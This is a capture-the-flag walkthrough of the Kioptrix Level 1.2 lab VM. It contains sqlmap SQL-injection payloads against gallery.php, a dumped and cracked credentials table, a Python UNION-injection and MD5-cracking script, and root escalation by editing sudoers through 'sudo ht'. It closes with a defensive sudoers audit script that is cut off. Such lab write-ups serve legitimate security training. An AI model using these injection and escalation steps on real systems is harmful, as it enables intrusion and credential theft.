Kioptrix: Level 1.2 Walkthrough

Kioptrix Level 1.2 (also called Level 3) is a boot-to-root virtual machine hosted on VulnHub.

Description of the challenge
“It’s been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things, you know. After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated. As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being in the realm of the beginner I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to one’s own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com
Under Linux that would be /etc/hosts
There’s a web application involved, so to have everything nice and properly displayed you really need to do this.
Hope you enjoy Kioptrix VM Level 1.2 challenge.
452 Megs
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Have fun”

Identify the IP address of the Kioptrix machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-12 16:34 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0034s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.3
Host is up (0.23s latency).
MAC Address: B0:DF:3A:DE:59:08 (Samsung Electronics)
Nmap scan report for 192.168.1.4
Host is up (0.23s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Unknown)
Nmap scan report for 192.168.1.5
Host is up (0.23s latency).
MAC Address: 08:6D:41:BA:BD:EC (Unknown)
Nmap scan report for 192.168.1.7
Host is up (0.23s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.9
Host is up (0.23s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.11
Host is up (0.00031s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.15s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.20
Host is up (0.00046s latency).
MAC Address: 08:00:27:A7:51:4E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.16
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 7.51 seconds
root@kali:~#

The only host with an Oracle VirtualBox MAC prefix (08:00:27) is 192.168.1.20, so that is the target VM; 192.168.1.16, reported without a MAC, is the Kali box itself.

Identify services running on Kioptrix

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.20
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-12 16:34 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Initiating ARP Ping Scan at 16:34
Scanning 192.168.1.20 [1 port]
Completed ARP Ping Scan at 16:34, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:34
Completed Parallel DNS resolution of 1 host. at 16:34, 0.02s elapsed
Initiating Connect Scan at 16:34
Scanning 192.168.1.20 [65535 ports]
Discovered open port 22/tcp on 192.168.1.20
Discovered open port 80/tcp on 192.168.1.20
Completed Connect Scan at 16:34, 3.67s elapsed (65535 total ports)
Initiating Service scan at 16:34
Scanning 2 services on 192.168.1.20
Completed Service scan at 16:34, 6.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.20
NSE: Script scanning 192.168.1.20.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.22s elapsed
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Nmap scan report for 192.168.1.20
Host is up (0.00040s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 08:00:27:A7:51:4E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.013 days (since Fri May 12 16:15:26 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.40 ms 192.168.1.20
NSE: Script Post-scanning.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.01s elapsed
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.33 seconds
Raw packets sent: 20 (1.626KB) | Rcvd: 16 (1.338KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 4.7p1

root@kali:~# ssh kioptrix@192.168.1.20
The authenticity of host '192.168.1.20 (192.168.1.20)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.20' (RSA) to the list of known hosts.
kioptrix@192.168.1.20's password:
Permission denied, please try again.
kioptrix@192.168.1.20's password:
Permission denied, please try again.
kioptrix@192.168.1.20's password:

Guessing a login over SSH gets nowhere, and no public exploit matching OpenSSH 4.7p1 was found, so attention moves to the web server.

Port 80 — Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4–2ubuntu5.6 with Suhosin-Patch)

The web root serves an index.php page (the "Ligoat Security" site seen in the http-title above).

Let's browse the website and get a feel for it by following the various links on the page.

http://192.168.1.20/
http://192.168.1.20/gallery/
http://kioptrix3.com/gallery/g.php/1
http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos
http://192.168.1.20/index.php?system=Blog
http://192.168.1.20/index.php?system=Admin

The gallery page takes two GET parameters, id and sort. We test them for SQL injection by appending a single quote to id.

http://kioptrix3.com/gallery/gallery.php?id=1'&sort=photoid#photos

The page now returns a database error instead of the gallery, which confirms that the id parameter is concatenated into a SQL query without sanitisation.
Exploitation using Sqlmap

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:57:09
[16:57:09] [INFO] testing connection to the target URL
[16:57:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:57:09] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[16:57:09] [INFO] testing MySQL
[16:57:09] [INFO] confirming MySQL
[16:57:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0

[16:57:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:57:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 16:57:09
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL --dbs
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:58:53
[16:58:53] [INFO] testing connection to the target URL
[16:58:53] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:58:53] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[16:58:54] [INFO] testing MySQL
[16:58:54] [INFO] confirming MySQL
[16:58:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[16:58:54] [INFO] fetching database names
[16:58:54] [INFO] the SQL query used returns 3 entries
[16:58:54] [INFO] resumed: information_schema
[16:58:54] [INFO] resumed: gallery
[16:58:54] [INFO] resumed: mysql
available databases [3]:
[*] gallery
[*] information_schema
[*] mysql
[16:58:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:58:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 16:58:54
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL -D gallery --tables
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:00:27
[17:00:27] [INFO] testing connection to the target URL
[17:00:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:00:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[17:00:27] [INFO] testing MySQL
[17:00:27] [INFO] confirming MySQL
[17:00:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[17:00:27] [INFO] fetching tables for database: 'gallery'
[17:00:27] [INFO] the SQL query used returns 7 entries
[17:00:27] [INFO] resumed: dev_accounts
[17:00:27] [INFO] resumed: gallarific_comments
[17:00:27] [INFO] resumed: gallarific_galleries
[17:00:27] [INFO] resumed: gallarific_photos
[17:00:27] [INFO] resumed: gallarific_settings
[17:00:27] [INFO] resumed: gallarific_stats
[17:00:27] [INFO] resumed: gallarific_users
Database: gallery
[7 tables]
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
[17:00:27] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:00:27] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 17:00:27
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL -D gallery -T dev_accounts --dump
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:01:16
[17:01:16] [INFO] testing connection to the target URL
[17:01:16] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:01:16] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[17:01:16] [INFO] testing MySQL
[17:01:16] [INFO] confirming MySQL
[17:01:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[17:01:16] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[17:01:16] [INFO] the SQL query used returns 3 entries
[17:01:16] [INFO] the SQL query used returns 3 entries
[17:01:16] [INFO] resumed: id
[17:01:16] [INFO] resumed: int(10)
[17:01:16] [INFO] resumed: username
[17:01:16] [INFO] resumed: varchar(50)
[17:01:16] [INFO] resumed: password
[17:01:16] [INFO] resumed: varchar(50)
[17:01:16] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[17:01:16] [INFO] the SQL query used returns 2 entries
[17:01:16] [INFO] resumed: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[17:01:16] [INFO] resumed: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[17:01:16] [INFO] analyzing table dump for possible password hashes
[17:01:16] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[17:01:19] [INFO] using hash method 'md5_generic_passwd'
[17:01:19] [INFO] resuming password 'starwars' for hash '5badcaf789d3d1d09794d8f021f40f0e' for user 'loneferret'
[17:01:19] [INFO] resuming password 'Mast3r' for hash '0d3eccfb887aabd50f243b3f155c0f85' for user 'dreg'
[17:01:19] [INFO] postprocessing table dump
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
[17:01:19] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[17:01:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:01:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 17:01:19
root@kali:~#
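The following Python script is an added example, not part of the original walkthrough, that reproduces by hand what sqlmap's UNION technique did above: it builds a 6-column UNION payload bracketed by the same marker strings sqlmap used (0x716b7a7071 and 0x7170626271), pulls username:hash pairs out of a constructed copy of the server's response, and runs a small dictionary attack on the unsalted MD5 hashes from dev_accounts. The SQL shape of the payload, the sample HTML and the wordlist are assumptions made for the demonstration; nothing is sent to a live host.

```python
# Added example: manual UNION-based extraction of gallery.dev_accounts followed by
# dictionary cracking of the unsalted MD5 hashes. The payload shape, the sample HTML
# response and the wordlist are constructed for the demo; nothing is sent anywhere.
import hashlib
import re
import urllib.parse

# sqlmap brackets its output with two random marker strings so it can locate it
# inside arbitrary HTML. These are the hex literals from the sqlmap run above.
MARK_L = bytes.fromhex("716b7a7071").decode()   # "qkzpq"
MARK_R = bytes.fromhex("7170626271").decode()   # "qpbbq"
COLUMNS = 6  # column count sqlmap found for gallery.php?id=


def hx(s):
    """Hex-encode a string literal as 0x... so the payload needs no quotes."""
    return "0x" + s.encode().hex()


def build_union_payload(table, fields):
    """Value for the id parameter: a 6-column UNION whose first column carries
    every row of `fields` from `table`, each row wrapped in the markers and all
    rows joined by GROUP_CONCAT. (Assumed SQL shape, not copied from the page.)"""
    parts = [hx(MARK_L)]
    for i, field in enumerate(fields):
        if i:
            parts.append(hx(":"))
        parts.append(field)
    parts.append(hx(MARK_R))
    row = "CONCAT(" + ",".join(parts) + ")"
    nulls = ",".join(["NULL"] * (COLUMNS - 1))
    # id=-1 makes the application's own SELECT match nothing, so only our rows
    # come back. The trailing '#' comments out whatever follows (the ORDER BY).
    return f"-1 UNION ALL SELECT GROUP_CONCAT({row}),{nulls} FROM {table}#"


def build_url(base, payload):
    """Full request URL; urlencode handles spaces and the trailing '#'."""
    return base + "?" + urllib.parse.urlencode({"id": payload, "sort": "photoid"})


def extract_rows(html):
    """Pull every marker-delimited row out of the response and split its fields."""
    pattern = re.escape(MARK_L) + r"(.*?)" + re.escape(MARK_R)
    return [tuple(hit.split(":")) for hit in re.findall(pattern, html, re.S)]


def crack_md5(digest, wordlist):
    """Unsalted MD5: one hash per candidate word, no salt, no work factor."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def recover_credentials(html, wordlist):
    """Map username -> (hash, cracked plaintext or None)."""
    return {user: (h, crack_md5(h, wordlist)) for user, h in extract_rows(html)}


# Constructed stand-in for what gallery.php would return for the payload; the two
# hashes are the ones dumped from dev_accounts above.
SAMPLE_RESPONSE = (
    "<html><body><h1>Ligoat Security</h1><div class='gallery'>"
    "qkzpqdreg:0d3eccfb887aabd50f243b3f155c0f85qpbbq,"
    "qkzpqloneferret:5badcaf789d3d1d09794d8f021f40f0eqpbbq"
    "</div></body></html>"
)
# Constructed mini wordlist; a real run would use rockyou.txt or similar.
WORDLIST = ["password", "123456", "kioptrix", "starwars", "Mast3r", "ligoat"]

if __name__ == "__main__":
    payload = build_union_payload("dev_accounts", ("username", "password"))
    print(build_url("http://kioptrix3.com/gallery/gallery.php", payload))
    for user, (h, pw) in recover_credentials(SAMPLE_RESPONSE, WORDLIST).items():
        print(f"{user}: {h} -> {pw}")
```

Two practical caveats: GROUP_CONCAT is capped by group_concat_max_len (1024 bytes by default), so large tables need LIMIT/OFFSET paging instead; and the hashes crack instantly only because the application stores plain MD5 with no salt, which is why sqlmap's built-in dictionary attack finished in under a second.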

Let's log in over SSH as dreg with the cracked password Mast3r.

root@kali:~# ssh dreg@192.168.1.20
dreg@192.168.1.20's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Fri May 12 17:04:03 2017 from 192.168.1.16
dreg@Kioptrix3:~$ ls -la
total 24
drwxr-xr-x 2 dreg dreg 4096 2017-05-12 17:04 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw-r--r-- 1 dreg dreg 220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg 2940 2011-04-16 07:54 .bashrc
-rw-r--r-- 1 dreg dreg 586 2011-04-16 07:54 .profile
dreg@Kioptrix3:~$ cd /
-rbash: cd: restricted
dreg@Kioptrix3:~$ id
uid=1001(dreg) gid=1001(dreg) groups=1001(dreg)
dreg@Kioptrix3:~$ sudo -l
[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.
dreg@Kioptrix3:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to 192.168.1.20 closed.
root@kali:~#

dreg lands in a restricted shell (rbash): cd is blocked, the home directory holds nothing of interest, and dreg is not allowed to use sudo.
Let's log in as loneferret instead, with the password starwars.

root@kali:~# ssh loneferret@192.168.1.20
loneferret@192.168.1.20's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Fri May 12 17:14:12 2017 from 192.168.1.16
loneferret@Kioptrix3:~$ ls -la
total 68
drwxr-xr-x 3 loneferret loneferret 4096 2017-05-12 17:15 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw-r--r-- 1 loneferret users 95 2017-05-12 17:16 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 2011-04-11 17:00 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2011-04-11 17:00 .bashrc
-rwxrwxr-x 1 root root 26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root root 224 2011-04-16 08:51 CompanyPolicy.README
-rw-r--r-- 1 root root 1681 2017-05-12 17:15 .htcfg2
-rw------- 1 root root 15 2011-04-15 21:21 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 2011-04-11 17:00 .profile
drwx------ 2 loneferret loneferret 4096 2011-04-14 11:05 .ssh
-rw-r--r-- 1 loneferret loneferret 0 2011-04-11 18:00 .sudo_as_admin_successful
loneferret@Kioptrix3:~$ ./checksec.sh
Usage: checksec [OPTION]
Options:
--file <executable-file>
--dir <directory> [-v]
--proc <process name>
--proc-all
--proc-libs <process ID>
--kernel
--fortify-file <executable-file>
--fortify-proc <process ID>
--version
--help
For more information, see:
http://www.trapkit.de/tools/checksec.html
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht

ht fails at first because this old Ubuntu image has no terminfo entry for xterm-256color; setting TERM=xterm works around it. Since ht now runs as root through sudo, it can open and save files that only root may read or write. So let's open /etc/sudoers with it.

Inside ht we add /bin/bash to the commands loneferret may run with sudo, save the file and exit. loneferret can then start a root shell:

loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)

loneferret@Kioptrix3:~$ sudo /bin/bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)

root@Kioptrix3:~# cd /root/
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18
root@Kioptrix3:/root# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
root@Kioptrix3:/root#
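The escalation above works because any sudo rule that lets a user run an interactive editor as root is a full root grant: the editor can rewrite /etc/sudoers itself. The Python below is an added check, not part of the original walkthrough or of the VM, that parses sudoers user specifications and flags such rules. The sample sudoers lines, the list of root-equivalent programs and the tuple layout of the findings are constructed assumptions; the loneferret line is illustrative and not a copy of the VM's actual file.

```python
# Added example: audit sudoers user specifications for commands that are as good
# as root. The sample rules are constructed for the demo, not Kioptrix's real file.
import os
import re

# Programs that read or write arbitrary files, or spawn a shell, when run as root.
# ht is the case from this box; the rest are common editors, pagers and shells.
# (Assumed starting list; extend it for your environment.)
ROOT_EQUIVALENT = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "sh", "bash"}

# user  host=(runas) [TAG: ...] cmd, cmd, ...   (one user specification per line)
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Yield (who, runas, tags, [commands]) for every user specification.
    Comments, blank lines, Defaults and alias definitions are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Host_Alias",
                                        "Cmnd_Alias", "Runas_Alias")):
            continue
        m = RULE.match(line)
        if not m:
            continue
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        tags = set(m.group("tags").replace(" ", "").rstrip(":").split(":")) - {""}
        yield m.group("who"), m.group("runas") or "root", tags, cmds


def audit_sudoers(text):
    """Return findings as (who, command, reason, nopasswd) tuples."""
    findings = []
    for who, runas, tags, cmds in parse_sudoers(text):
        # Only rules that can run as root matter here; "(ALL)" covers root.
        runas_users = {u.strip() for u in runas.split(":")[0].split(",")}
        if not {"root", "ALL"} & runas_users:
            continue
        for cmd in cmds:
            if cmd.startswith("!"):
                continue  # explicit denial such as !/usr/bin/su
            path = cmd.split()[0]
            if path == "ALL":
                reason = "any command as root"
            elif os.path.basename(path) in ROOT_EQUIVALENT:
                reason = "root-equivalent program (file write or shell escape)"
            else:
                continue
            findings.append((who, path, reason, "NOPASSWD" in tags))
    return findings


# Constructed sample; the loneferret line is illustrative, not the VM's real rule.
SAMPLE_SUDOERS = """\
# constructed sample for the demo
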